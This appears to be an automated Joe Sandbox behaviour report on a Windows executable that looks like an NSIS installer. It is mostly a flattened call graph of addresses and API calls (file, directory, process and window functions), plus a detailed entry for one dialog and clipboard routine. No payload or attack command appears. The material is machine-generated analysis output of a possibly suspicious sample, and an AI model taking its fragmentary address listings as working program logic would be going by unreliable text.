SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                        • API String ID: 2110491804-1641061399
